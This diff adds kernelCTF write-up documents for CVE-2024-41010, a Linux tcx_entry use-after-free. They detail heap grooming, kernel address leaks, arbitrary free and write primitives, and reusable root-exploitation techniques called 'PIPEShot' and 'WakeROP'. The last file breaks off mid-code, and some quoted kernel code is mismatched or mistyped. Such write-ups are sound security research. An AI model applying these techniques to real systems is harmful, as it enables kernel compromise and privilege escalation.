diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md new file mode 100644 index 00000000..206757a6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md @@ -0,0 +1,470 @@ +# Exploit detail about CVE-2024-41010 + +## Primitive +When UAF triggered at `uaf_chunk`, we can modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value. + +## Leak kBase and Controlable kHeap +### Trigger Cross-Cache (kmalloc-2k -> per-cpu buddy) +From [Trigger Vulnerability](#trigger-vulnerability), we know that UAF can be triggered at `kmalloc-2k`. There arn't exist appropriate controlable structure in `kmalloc-2k`, so we need to trigger cross-cache to control `uaf` content. + +In our exploit, we spray `kmalloc-2k` by using `struct super_block`. We can `mount` and `unmount` tmpfs, and it alloc / free only 1 `kmalloc-2k` chunk for each call. +```c++ +struct super_block { + struct list_head s_list; /* 0 16 */ + dev_t s_dev; /* 16 4 */ + unsigned char s_blocksize_bits; /* 20 1 */ + + /* XXX 3 bytes hole, try to pack */ + + long unsigned int s_blocksize; /* 24 8 */ + loff_t s_maxbytes; /* 32 8 */ + struct file_system_type * s_type; /* 40 8 */ + const struct super_operations * s_op; /* 48 8 */ + const struct dquot_operations * dq_op; /* 56 8 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + const struct quotactl_ops * s_qcop; /* 64 8 */ + const struct export_operations * s_export_op; /* 72 8 */ + long unsigned int s_flags; /* 80 8 */ + long unsigned int s_iflags; /* 88 8 */ + long unsigned int s_magic; /* 96 8 */ + struct dentry * s_root; /* 104 8 */ + struct rw_semaphore s_umount; /* 112 40 */ + + [...] + + /* XXX 4 bytes hole, try to pack */ + + struct list_head s_inodes_wb; /* 1376 16 */ + + /* size: 1408, cachelines: 22, members: 58 */ + /* sum members: 1321, holes: 8, sum holes: 71 */ + /* padding: 16 */ + /* forced alignments: 3, forced holes: 1, sum forced holes: 44 */ +} __attribute__((__aligned__(64))); +``` + +### Trigger Cross-Cache (per-cpu buddy -> kmalloc-cg-2k) +--- +When we use Cross-Cache, for stability, we must cross-cache same order with `kmalloc-2k`. Therefore, we need to trigger cross-cache from `per-cpu buddy` to `kmalloc-cg-2k`. + +In our exploit, we use `struct simple_xattr` as cross-cache's uaf victim. The shape of `struct simple_xattr` is as follows: +```c++ +struct simple_xattr { + struct rb_node rb_node __attribute__((__aligned__(8))); /* 0 24 */ + char * name; /* 24 8 */ + size_t size; /* 32 8 */ + char value[]; /* 40 0 */ + + /* size: 40, cachelines: 1, members: 4 */ + /* forced alignments: 1 */ + /* last cacheline: 40 bytes */ +} __attribute__((__aligned__(8))); +``` + +So, by using Cross-Cache, we overlap `struct simple_xattr` with `uaf_chunk` + +### Modify `struct simple_xattr`'s `size` +At [Trigger Vulnerability](#trigger-vulnerability), we know that can modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value. Therefore, by overlapping, we can control `struct simple_xattr`'s `size` as `start_poll_synchronize_rcu()` return value. + +The import things is that the first value of `struct simple_xattr` is `rb_node`. The `struct rb_node` is as follows: +```c++ +struct rb_node { + long unsigned int __rb_parent_color; /* 0 8 */ + struct rb_node * rb_right; /* 8 8 */ + struct rb_node * rb_left; /* 16 8 */ + + /* size: 24, cachelines: 1, members: 3 */ + /* last cacheline: 24 bytes */ +} __attribute__((__aligned__(8))); +``` + +Therefore, `uaf_chunk[0]` is `(struct rb_node *)uaf_chunk -> __rb_parent_color`. `__rb_parent_color` is constructed as follows: +```c++ +#define RB_RED 0 +#define RB_BLACK 1 + +__rb_parent_color = (unsigned long)parent | color; +``` + +Therefore, we must set the `struct simple_xattr`'s parent color as `RB_RED` which overlapped with `uaf_chunk`. By doing this, we can control `struct simple_xattr`'s `size` as `start_poll_synchronize_rcu()` return value. + +So, We needs to construct structure's allocation as follows: +``` + ------------------ + ╭--> | parent | + | ------------------ + | + ------------------ ------------------ +uaf_chunk -> | rchild | | lchild | + ------------------ ------------------ +``` + +When we modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value, we can change `parent->size` as `start_poll_synchronize_rcu()` return value. + +From [Cross-Cache (per-cpu buddy -> kmalloc-cg-2k)](#cross-cache-per-cpu-buddy---kmalloc-cg-2k), the `lchild`'s size must be use `kmalloc-cg-2k` and we can freely choose `parent`'s slab cache on `kmalloc-cg-64 ~ kmalloc-cg-4k` and `8k, 16k, 32k` managed by buddy allocator. + +### Bypass CONFIG_HARDENED_USERCOPY +The kenrel have config CONFIG_HARDENED_USERCOPY, which makes impossible to copy out of bounded slab kernel memory triggered by using `copy_to_user()`. However, the `simple_xattr_alloc()` alloc kernel memory and copy to there first([1]). After that, `copy_to_user()` executed([2]). For this reason, if we can overwrite `struct simple_xattr` size to any size below `XATTR_SIZE_MAX (0x10000)`, leaking out of bound slab kernel memory is available. +```cpp +ssize_t +do_getxattr(struct mnt_idmap *idmap, struct dentry *d, + struct xattr_ctx *ctx) +{ + ssize_t error; + char *kname = ctx->kname->name; + + if (ctx->size) { + if (ctx->size > XATTR_SIZE_MAX) + ctx->size = XATTR_SIZE_MAX; + ctx->kvalue = kvzalloc(ctx->size, GFP_KERNEL); // [1] + if (!ctx->kvalue) + return -ENOMEM; + } + + if (is_posix_acl_xattr(ctx->kname->name)) + error = do_get_acl(idmap, d, kname, ctx->kvalue, ctx->size); + else + error = vfs_getxattr(idmap, d, kname, ctx->kvalue, ctx->size); + if (error > 0) { + if (ctx->size && copy_to_user(ctx->value, ctx->kvalue, error)) // [2] + error = -EFAULT; + } else if (error == -ERANGE && ctx->size >= XATTR_SIZE_MAX) { + /* The file system tried to returned a value bigger + than XATTR_SIZE_MAX bytes. Not possible. */ + error = -E2BIG; + } + + return error; +} +``` + +### OOB Read at `parent` Chunk +#### Leak Controlable kHeap +From [bypass CONFIG_HARDENED_USERCOPY](#bypass-config_hardened_usercopy), we can read out-of-bounds information of slab cache eventhought `CONFIG_HARDENED_USERCOPY` is enabled. + +WLOG, consider that `parent` is `kmalloc-cg-256` and we spray many `struct simple_xattr`. Then, we can read out-of-bounds information of `kmalloc-cg-256` slab cache. It is shown as follows: +``` + -------------------------------------- +| parent.rb_node | +| parent.name | +| parent.size | +| parent.value | + -------------------------------------- +| xattr<1>.rb_node | +| xattr<1>.name | +| xattr<1>.size | +| xattr<1>.value | + -------------------------------------- +``` + +Therefore, by using OOB read, we can leak `kHeap` address by read `xattr1.rb_node`'s address. The important thing is we can give value at `xattr<*>.value`. Therefore, by reading `xattr<*>.value` and `xattr<*>.rb_node`'s value, we can identify `xattr<*>`'s `lchild`, `rchild`, and `parent`'s kernel address clearly. It dramatically increase the stability of the exploit. + +We can free known kernel address whenever we want. + +#### Leak kbase +When we read OOB data of `parent`, we can read `kbase` address which remained as a uninitialized value. + +## Obtain Arbitrary Address Free Primitive +### Cross-Cache (kmalloc-2k -> kmalloc-32k) +By proceeding process at [Trigger Cross-Cache (kmalloc-2k -> per-cpu buddy)](#trigger-cross-cache-kmalloc-2k---per-cpu-buddy), and reallocate to `kmalloc-32k`(not slab cache, but buddy. For convenience, we will call like that). `kmalloc-2k` cache and `kmalloc-32k` cache is same order(order 3), so we can reallocate to `kmalloc-32k` cache. + +Then the status of memory is shown as follows: +``` + -------- kmalloc-32k --------- +| ... | +| uaf_chunk | +| ... | + ------------------------------ +``` + +uaf_chunk was in `kmalloc-2k` slab cache, so if cross-cached, it will be in somewhere in `kmalloc-32k` slab cache. Then, If we overlap `uaf_chunk` with `struct simple_xattr` which is the size of `kmalloc-32k`, we can modify `uaf_chunk[0]`'s address freely. The reason is that `uaf_chunk[0]` is will be placed on somewhere in `struct simple_xattr.value[]`. + +### Modify `struct simple_xattr.rb_node->parent.rb_right` +From [Cross-Cache (kmalloc-2k -> kmalloc-32k)](#cross-cache-kmalloc-2k---kmalloc-32k), we can modify `uaf_chunk[0]`'s address freely and from [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk), we know the `xattr<*>`'s `lchild`, `rchild`, and `parent`'s kernel address. + +Let assume that `uaf_chunk[0]`'s address is `xattr<1>.parent - 0x1f` which set at [Cross-Cache (kmalloc-2k -> kmalloc-32k)](#cross-cache-kmalloc-2k---kmalloc-32k). + +Then the status of memory is shown as follows: +``` + -------- uaf_chunk -------- offset +| xattr<1>.parent - 0x1f | -----> | .... | -0x1f +| ... | | .... | -0x17 + --------------------------- | .... | -0xf + | .... | -0x7 + ------ xattr<1>.parent + 1 ------ + | .... | +0x1: xattr<1>.parent + 1 + | .... | + --------------------------------- +``` + +Then, when we trigger [Trigger Vulnerability](#trigger-vulnerability), we can modify `xattr<1>.parent[1, 9)` to `start_poll_synchronize_rcu()` return value. And we know that `start_poll_synchronize_rcu()`'s 7th byte is `0x00`. + +After trigger UAF write and observe memory from the perspective of `struct xattr<1>.parent`. It is shown as follows: +``` + ------------- xattr<1>.parent ------------- +| start_poll_synchronize_rcu() value | ?? | +| xattr<1> address | 00 | +| ... | + ------------------------------------------- +``` + +So, we trigger off-by-one at `xattr<1>.parent`. + +### Trigger (Weak) Arbitrary Address Free +Let `xattr<1>.rb_node.parent->rb_right` is allocated in `kmalloc-cg-192`. + +#### Why `kmalloc-cg-192`? It was `kmalloc-cg-256`! +We can make `Let xattr<1>.rb_node.parent->rb_child` by proceeding like below. + +1. allocate `kmalloc-cg-256` : `xattr<1>.parent` +2. allocate `kmalloc-cg-2k` : `xattr<1>` +3. leak `xattr<1>.parent`'s address : from [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk) +4. free `xattr<1>` +5. allocate `kmalloc-cg-192` : `xattr<1>.rb_node.parent->rb_child` + +Then, we change `kmalloc-cg-256` to `kmalloc-cg-192`. + +For convinience, let's call `rb_child` by `rchild`. + +Then, when kernel tried to access to `xattr<1>`(`kmalloc-cg-192`), it accessed to `xattr<1> & ~(0xff)` because of [Modify `struct simple_xattr.rb_node->parent.rb_right`](#modify-struct-simple_xattrrb_node-parentrb_right). + +The `kmalloc-cg-192` has 4 cases when off-by-one triggered. It is shown as follows: +1. `xattr<1> & 0x3ff` is `0x000` + - `xattr<1> & ~(0xff)` is same with `xattr<1>`, so nothing changed. +2. `xattr<1> & 0x3ff` is `0x0c0` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0xc0`, so point other sprayed `&struct simple_xattr.rb_node`. +3. `xattr<1> & 0x3ff` is `0x180` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0x80`, so point other sprayed `&struct simple_xattr.value[0x18]`. +4. `xattr<1> & 0x3ff` is `0x240` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0x40`, so point other sprayed `&struct simple_xattr.value[0x58]`. + +Therefore, when `xattr<1> & 0x3ff == 0x180` or `xattr<1> & 0x3ff == 0x240`, we can use `simple_xattr.value[]` as fake `struct simple_xattr`. + +Therefore, when we set value to `struct simple_xattr.value` as fake chunk, trigger off-by-one, and delete `xattr<1>`, `xattr<1>->name` will be freed. + +Therefore, we can free arbitrary address where we can set `xattr<1>->name`'s prefix as `"security."` (for remove xattr, prefix condition must be satisfied because code find xattr by `xattr<1>->name`). + +## Trigger Double Free +Now, we will trigger double-free on `kmalloc-cg-64` slab cache. + +### Hmm, how we know `kmalloc-cg-64`'s address? +From [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk), we can read out-of-bounds information of slab cache. Therefore, by setting `rchild` as `kmalloc-cg-256`, and `rchild->name` to `kmalloc-cg-64` chunk, we can leak `kmalloc-cg-64`'s address. Also, we can free `kmalloc-cg-64` anytime we want! + +Therefore, when we allocate chunk to satisfy Precondition, we can trigger double free +- Precondition: prefix of `&rchild->name[0x28]` is `"security."`(for satisfy [Trigger (Weak) Arbitrary Address Free](#trigger-weak-arbitrary-address-free)) condition + +Let's call each chunk as `double_free_rchild` and `double_free_fake_xattr`. + +## Arbitrary Address Write & Arbitrary Address Execute +Before AAW, AAE, abstract our primitive. +- When free `double_free_rchild`, we can free `double_free_chunk` +- When free `double_free_fake_xattr`, we can free `double_free_chunk + 0x28` +- `double_free_chunk` is `kmalloc-64` + +as diagram, it is shown as follows: +``` +offset --------- double_free_rchild --------- ++0x00 | | ++0x08 | | ++0x10 | | ++0x18 | | ++0x20 | | + ------- double_free_fake_xattr ------- ++0x28 | | | ++0x30 | | | ++0x38 | | | + -------------------------------------- | ++0x40 | | ++0x48 | | ++0x50 | | ++0x58 | | ++0x60 | | + -------------------------------------- +``` + +### Leak VMEMMAP_BASE +Proceding like below, we can leak `VMEMMAP_BASE`. +1. free `double_free_fake_xattr` +2. allocate `struct pipe_buffer` at freed `double_free_chunk` +3. free `double_free_rchild` +4. allocate `struct msg_msgseg` at freed `double_free_chunk` +5. call `pipe_write()`(it allocate vmemmap address at `struct pipe_buffer->page`) +6. read `struct pipe_buffer->page`'s address by read `struct msg_msg` + +each struct are as follows: +```c++ +struct msg_msg { + struct list_head m_list; /* 0 16 */ + long int m_type; /* 16 8 */ + size_t m_ts; /* 24 8 */ + struct msg_msgseg * next; /* 32 8 */ + void * security; /* 40 8 */ + + /* size: 48, cachelines: 1, members: 5 */ + /* last cacheline: 48 bytes */ +}; + +struct msg_msgseg { + struct msg_msgseg * next; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct pipe_buffer { + struct page * page; /* 0 8 */ + unsigned int offset; /* 8 4 */ + unsigned int len; /* 12 4 */ + const struct pipe_buf_operations * ops; /* 16 8 */ + unsigned int flags; /* 24 4 */ + + /* XXX 4 bytes hole, try to pack */ + + long unsigned int private; /* 32 8 */ + + /* size: 40, cachelines: 1, members: 6 */ + /* sum members: 36, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +}; + +struct pipe_buf_operations { + int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *); /* 0 8 */ + void (*release)(struct pipe_inode_info *, struct pipe_buffer *); /* 8 8 */ + bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *); /* 16 8 */ + bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); /* 24 8 */ + + /* size: 32, cachelines: 1, members: 4 */ + /* last cacheline: 32 bytes */ +}; +``` + +when step(5), the memory is shown as follows: +``` +offset --------- struct msg_msgseg --------- ++0x00 | next | ++0x08 | msg_msgseg.data[0, 8) | ++0x10 | ... | ++0x18 | | ++0x20 | | + --------- struct pipe_buffer --------- ++0x28 | msg_msgseg.data[0x20, 0x28) | pipe_buffer->page | ++0x30 | | | ++0x38 | | | + -------------------------------------- | ++0x40 | | ++0x48 | | ++0x50 | | ++0x58 | | ++0x60 | | + -------------------------------------- +``` + +So, we can obtain VMEMMAP_BASE. + + +### Arbitrary Address Write +Using `struct pipe_buffer`, we can write arbitrary address. From `pipe_write()`, we can write arbitrary address to `pipe_buffer->page`. +```c++ +static ssize_t +pipe_writev(struct file *filp, const struct iovec *_iov, + unsigned long nr_segs, loff_t *ppos) +{ + struct inode *inode = filp->f_dentry->d_inode; + struct pipe_inode_info *info; + ssize_t ret; + int do_wakeup; + struct iovec *iov = (struct iovec *)_iov; + size_t total_len; + ssize_t chars; + + [...] + + chars = total_len & (PAGE_SIZE-1); /* size of the last buffer */ + if (info->nrbufs && chars != 0) { + int lastbuf = (info->curbuf + info->nrbufs - 1) & (PIPE_BUFFERS-1); + struct pipe_buffer *buf = info->bufs + lastbuf; + struct pipe_buf_operations *ops = buf->ops; + int offset = buf->offset + buf->len; + if (ops->can_merge && offset + chars <= PAGE_SIZE) { + void *addr = ops->map(filp, info, buf); + int error = pipe_iov_copy_from_user(offset + addr, iov, chars); + ops->unmap(info, buf); + ret = error; + do_wakeup = 1; + if (error) + goto out; + buf->len += chars; + total_len -= chars; + ret = chars; + if (!total_len) + goto out; + } + } + + for (;;) { + int bufs; + if (!PIPE_READERS(*inode)) { + send_sig(SIGPIPE, current, 0); + if (!ret) ret = -EPIPE; + break; + } + bufs = info->nrbufs; + if (bufs < PIPE_BUFFERS) { + int newbuf = (info->curbuf + bufs) & (PIPE_BUFFERS-1); + struct pipe_buffer *buf = info->bufs + newbuf; + struct page *page = info->tmp_page; + int error; + + if (!page) { + page = alloc_page(GFP_HIGHUSER); + if (unlikely(!page)) { + ret = ret ? : -ENOMEM; + break; + } + info->tmp_page = page; + } + /* Always wakeup, even if the copy fails. Otherwise + * we lock up (O_NONBLOCK-)readers that sleep due to + * syscall merging. + * FIXME! Is this really true? + */ + do_wakeup = 1; + chars = PAGE_SIZE; + if (chars > total_len) + chars = total_len; + + error = pipe_iov_copy_from_user(kmap(page), iov, chars); + + [...] + +out: + up(PIPE_SEM(*inode)); + if (do_wakeup) { + wake_up_interruptible(PIPE_WAIT(*inode)); + kill_fasync(PIPE_FASYNC_READERS(*inode), SIGIO, POLL_IN); + } + if (ret > 0) + inode_update_time(inode, 1); /* mtime and ctime */ + return ret; +} +``` + +However, the address of `pipe_buffer->page` is on vmemmap_base. Therefore, we should write converted address at `pipe_buffer->page`. + +The calculation proceeded as below: +```c++ +uint64_t virt_to_page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base) +{ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} +``` + +Now, we can write our input at arbitrary address. Already we leak `kbase`, `kheap`, and `vmemmap_base` so we can write our input at arbitrary address. + +### Arbitrary Address Execute +`struct pipe_buffer` has `struct pipe_operations`, and `struct pipe_operatprions->release()` called when `pipe_buffer` is freed. Therefore, we can execute arbitrary address by setting `struct pipe_buffer->ops` as the address of `struct msg_msgseg` and write address what we want to call at `struct msg_msgseg[0x8:0x10)`. + +Then, when `pipe_buffer` is freed, `struct pipe_buffer->ops->release()` is called and we can execute arbitrary address. + +## Oneshot Like Arbitrary Code Execution +The detail of AAW and RIP Pivoting is shown at [novel_techniques.md](novel_techniques.md#PIPEShot) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md new file mode 100644 index 00000000..a985f01c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md @@ -0,0 +1,210 @@ +# Novel Technique of exp183 + +## Roleback of Unsafe Unlink with `struct simple_xattr` +When the kernel was 6.1, the `struct simple_xattr` use list structure for save the data so corrupting kernel memory using unsafe unlinked is banned. However, in 6.6, they changed data structure to Rbtree and the Rbtree doesn't have any mitigation for linking and unlinking. +```cpp +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; +``` + +Therefore, we can use this property for exploiting. +The insertion of Rbtree node occur at `rb_link_node()` and this function just link `rb_node`. +```cpp +static inline void rb_link_node(struct rb_node *node, struct rb_node *parent, + struct rb_node **rb_link) +{ + node->__rb_parent_color = (unsigned long)parent; + node->rb_left = node->rb_right = NULL; + + *rb_link = node; +} +``` + +Simillary, the deletion of Rbtree node occur at `rb_erase()` and the main logic is `__rb_erase_augmented()` which called from `rb_erase()`. Let's consider very simple state, only one parent and two child, and try to remove one of child. Then this code run `rb_set_parent_color()`.([1]) +```cpp +static __always_inline struct rb_node * +__rb_erase_augmented(struct rb_node *node, struct rb_root *root, + const struct rb_augment_callbacks *augment) +{ + struct rb_node *child = node->rb_right; + struct rb_node *tmp = node->rb_left; + struct rb_node *parent, *rebalance; + unsigned long pc; + + { + + [...] + + tmp = node->rb_left; + WRITE_ONCE(successor->rb_left, tmp); + rb_set_parent(tmp, successor); + + pc = node->__rb_parent_color; + tmp = __rb_parent(pc); + __rb_change_child(node, successor, tmp, root); + + if (child2) { + rb_set_parent_color(child2, parent, RB_BLACK); // [1] + rebalance = NULL; + } else { + rebalance = rb_is_black(successor) ? parent : NULL; + } + successor->__rb_parent_color = pc; + tmp = successor; + } + + augment->propagate(tmp, NULL); + return rebalance; +} +``` + +The `rb_set_parent_color()` doesn't have any validation of linked Rbtree corruption, so unsafe unlink is possible. It makes write any accessable kernel address to any kernel address. Furthermore, the kernel doesn't panic eventhough the corruption of Rbtree node. It makes various type of exploitation potentially. +```cpp +static inline void +__rb_change_child(struct rb_node *old, struct rb_node *new, + struct rb_node *parent, struct rb_root *root) +{ + if (parent) { + if (parent->rb_left == old) + WRITE_ONCE(parent-(>rb_left, new); + else) + WRITE_ONCE(parent->rb_right, new); + } else + WRITE_ONCE(root->rb_node, new); +} +``` + +The exp183 use this premitive in two way. +1. The corruption of Rbtree node data doesn't trigger kernel panic, so freely free corrupted `struct simple_xattr` without any consideration. +2. Overwrite 1 byte of `node->rb_node.rb_right` to `0x00`(make fake_chunk) and use fake_chunk freely for triggering double_free and UAF. + +## Oneshot in Kernel: WakeROP +The RIP Pivoting not that powerful because we usually need ROP to exploit. Also, we need to use much time for finding proper gadget and it is changed everytime. We usually solve this problem only depended on the register and a few proper gadget. + +However, there are exist powerful gadget in `wakeup_long64()`. +```asm +SYM_FUNC_START(wakeup_long64) + movq saved_magic, %rax + movq $0x123456789abcdef0, %rdx + cmpq %rdx, %rax + je 2f + + /* stop here on a saved_magic mismatch */ + movq $0xbad6d61676963, %rcx +1: + jmp 1b +2: + movw $__KERNEL_DS, %ax + movw %ax, %ss + movw %ax, %ds + movw %ax, %es + movw %ax, %fs + movw %ax, %gs + movq saved_rsp, %rsp + + movq saved_rbx, %rbx + movq saved_rdi, %rdi + movq saved_rsi, %rsi + movq saved_rbp, %rbp + + movq saved_rip, %rax + ANNOTATE_RETPOLINE_SAFE + jmp *%rax +SYM_FUNC_END(wakeup_long64) +``` + +This code copy general purpose register from some variable, even `rip` and `rsp`. When you see this code in vmlinux, copy all register from code's `bss` and jump to `rax` address. +Therefore, only write some address to `saved_*` section makes full control of system. +``` + 0xffffffff8112c291 : mov rsp,QWORD PTR ds:0xffffffff83c51a68 + 0xffffffff8112c299 : mov rbx,QWORD PTR ds:0xffffffff83c51a58 + 0xffffffff8112c2a1 : mov rdi,QWORD PTR ds:0xffffffff83c51a50 + 0xffffffff8112c2a9 : mov rsi,QWORD PTR ds:0xffffffff83c51a48 + 0xffffffff8112c2b1 : mov rbp,QWORD PTR ds:0xffffffff83c51a40 + 0xffffffff8112c2b9 : mov rax,QWORD PTR ds:0xffffffff83c51a60 + 0xffffffff8112c2c1 : jmp rax +``` + +There are so many ways to apply this technique to exploit. exp184 also use this technique for exploiting. +This technique is helpful for below situation. + +0. Generally, + - it can be used when there is insufficient ROP space. + - it can be used when there is no proper gadget. (by calling `set_memory_x(saved_*)` and make arbitrary gadget) +1. UAF & Cross Cache Avaliable + - use [PIPEShot](#oneshot-in-kernel-wakerop): kernelctf exp183 +2. Only know kbase (by leak or side channel) & RIP pivoting + - use CEA (`write_cpu_entry_area`) + WakeROP: kernelctf exp184 + +## PIPEShot +Only [OneShot in Kernel: WakeROP](#oneshot-in-kernel-wakerop) is strong enough to exploit, but not general. We want to introduce PIPEShot, which is generally utilized for UAF exploit + +1. cross cache is available + - generally used for all SLAB UAF +2. cross cache is not availablex + - generally used for `kmalloc-cg-<64, 192, 512, and over>` SLAB UAF + +The main flow of PIPEShot is below. + +0. Let we know `kbase` and `kheapbase` address + - `kbase` is easily leaked by UAF or side channel + - `kheapbase` is easily leaked when UAF is available +1. Create pipe + - let `pipeshot_pipe` +``` + ----------- pipeshot_pipe ----------- +| | +| | + ------------------------------------- +``` +2. Trigger UAF +3. Alloc any object which user can R/W (e.g. `struct simple_xattr` or `struct msg_msgseg`) + - let `pipeshot_data`, then `pipeshot_pipe` and `pipeshot_data` are duplicated +``` + ----------- pipeshot_pipe ----------- ------------ pipeshot_data ---------- +| | | +| | | +| | | +| | | + ------------------------------------- ------------------------------------- +``` +4. Write to pipe + - If user write some data to pipe, save `VMEMMAP_BASE + alpha` addr to `pipeshot_pipe->buffer` +``` +----------- pipeshot_pipe ----------- ------------ pipeshot_data ---------- +| page | | +| offset | | +| len | | +| ops | | +| | | +------------------------------------- ------------------------------------- +``` +5. Read from `pipeshot_data` + - `pipeshot_pipe` and `pipeshot_data` are duplicated, so read from `pipeshot_data` can leak `pipeshot_pipe->buffer` address. Then we can leak `VMEMMAP_BASE` address. +6. Overwrite `pipeshot_pipe->buffer` to `virt_to_page(saved_*, kheapbase, vmemmap_base)` and set `pipeshot_pipe->ops->release` to `wakeup_long64 + 49`. + - It can be done by alloc any object which user can R/W (e.g. `struct simple_xattr` or `struct msg_msgseg`) and write data on it. +```c++ +uint64_t virt_to_page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base) +{ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} +``` +``` +----------- pipeshot_pipe ----------- ------------------ pipeshot_data2 ------------------- +| | virt_to_page(saved_*, kheapbase, vmemmap_base) | +| offset | | +| len | | +| | pipeshot_pipe + 0x18 |────┐ +| | |<───┘ +| | = wakeup_long64 + 49 | +| | | +------------------------------------- ----------------------------------------------------- +``` +8. Write to pipe + - Then, we can write any value to `saved_*` and ROP chain. Limitation of size is `0x1000` so it is enought to construct ROP chain. +9. Trigger ROP chain + - we can trigger WakeROP by freeing pipe. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md new file mode 100644 index 00000000..9ce08ab2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md @@ -0,0 +1,191 @@ +# Vulnerability detail about CVE-2024-41010 + +## Trigger Vulnerability + +The vulnerability occurs because `tcx_entry_fetch_or_create()`, which allocates `tcx_entry` objects, does not manage these objects using a reference count-based system. As a result, functions such as `clsact_init()`, `ingress_init()`, and `tcx_prog_attach()` are affected. + +The `tcx_entry_fetch_or_create()` is called in the following call stack when creating ingress qdisc/clsact qdisc: + +```c +rtnetlink_rcv_msg() + => tc_modify_qdisc() + => qdisc_create() + => ingress_init() + => tcx_entry_fetch_or_create() + => qdisc_graft() +``` + +This function calls `tcx_entry_create()` to allocate and link a new `tcx_entry` if none is registered with the network device [1]. If a `tcx_entry` is already registered, it retrieves it by calling `tcx_entry_fetch()` [2]. + +```jsx +static inline struct bpf_mprog_entry * +tcx_entry_fetch(struct net_device *dev, bool ingress) +{ + ASSERT_RTNL(); + if (ingress) + return rcu_dereference_rtnl(dev->tcx_ingress); // <==[3] + else + return rcu_dereference_rtnl(dev->tcx_egress); +} + +static inline struct bpf_mprog_entry * +tcx_entry_fetch_or_create(struct net_device *dev, bool ingress, bool *created) +{ + struct bpf_mprog_entry *entry = tcx_entry_fetch(dev, ingress); // <==[2] + + *created = false; + if (!entry) { + entry = tcx_entry_create(); // <==[1] + if (!entry) + return NULL; + *created = true; + } + return entry; +} + +static int ingress_init(struct Qdisc *sch, struct nlattr *opt, + struct netlink_ext_ack *extack) +{ + struct ingress_sched_data *q = qdisc_priv(sch); + struct net_device *dev = qdisc_dev(sch); + struct bpf_mprog_entry *entry; + bool created; + int err; + + if (sch->parent != TC_H_INGRESS) + return -EOPNOTSUPP; + + net_inc_ingress_queue(); + + entry = tcx_entry_fetch_or_create(dev, true, &created); + if (!entry) + return -ENOMEM; + tcx_miniq_set_active(entry, true); + mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // <==[4] + if (created) + tcx_entry_update(dev, entry, true); + + q->block_info.binder_type = FLOW_BLOCK_BINDER_TYPE_CLSACT_INGRESS; + q->block_info.chain_head_change = clsact_chain_head_change; + q->block_info.chain_head_change_priv = &q->miniqp; + + err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack); + if (err) + return err; + + mini_qdisc_pair_block_init(&q->miniqp, q->block); + + return 0; +} +``` + +The issue arises because there is no logic to increment the refcount, regardless of whether a `tcx_entry` is newly allocated or retrieved. This oversight can lead to problems down the line [3]. + +The `&tcx_entry->miniq` of this `tcx_entry` is stored in `miniqp->p_miniq` within `mini_qdisc_pair_init()` [4] and is subsequently used as a double pointer [5]. + +```c +void mini_qdisc_pair_init(struct mini_Qdisc_pair *miniqp, struct Qdisc *qdisc, + struct mini_Qdisc __rcu **p_miniq) +{ + miniqp->miniq1.cpu_bstats = qdisc->cpu_bstats; + miniqp->miniq1.cpu_qstats = qdisc->cpu_qstats; + miniqp->miniq2.cpu_bstats = qdisc->cpu_bstats; + miniqp->miniq2.cpu_qstats = qdisc->cpu_qstats; + miniqp->miniq1.rcu_state = get_state_synchronize_rcu(); + miniqp->miniq2.rcu_state = miniqp->miniq1.rcu_state; + miniqp->p_miniq = p_miniq; // <==[5] +} +EXPORT_SYMBOL(mini_qdisc_pair_init); +``` + +Next, `chain0` is linked to the `tc block` in the following call stack. Here, the `tc block` is pre-created with index 1 when the `ingress qdisc` is first allocated and references the `ingress qdisc`: + +```c +rtnetlink_rcv_msg() + => tc_ctl_chain() +``` + +Next, when a `clsact qdisc` is allocated to a network device that already has an `ingress qdisc`, the existing `ingress qdisc` is released and replaced by the `clsact qdisc` in the following call stack. During this process, the `tcx_entry` is also released: + +```c +rtnetlink_rcv_msg() + => tc_modify_qdisc() + => qdisc_create() + => clsact_init() + => tcf_block_get_ext() + => tcf_chain0_head_change_cb_add() + => qdisc_graft() + => qdisc_destroy() + => __qdisc_destroy() + => ingress_destroy() + => tcx_entry_free() + => kfree_rcu() +``` + +In the process of allocating this clsact qdisc, the `tcf_chain0_head_change_cb_add()` function is called. Since `chain0` was previously assigned to the `tc block` with index 1, connecting this `clsact qdisc` to the tc block with index 1 will also link an item to `&block->chain0.filter_chain_list` [6]. + +```c +static int +tcf_chain0_head_change_cb_add(struct tcf_block *block, + struct tcf_block_ext_info *ei, + struct netlink_ext_ack *extack) +{ + struct tcf_filter_chain_list_item *item; + struct tcf_chain 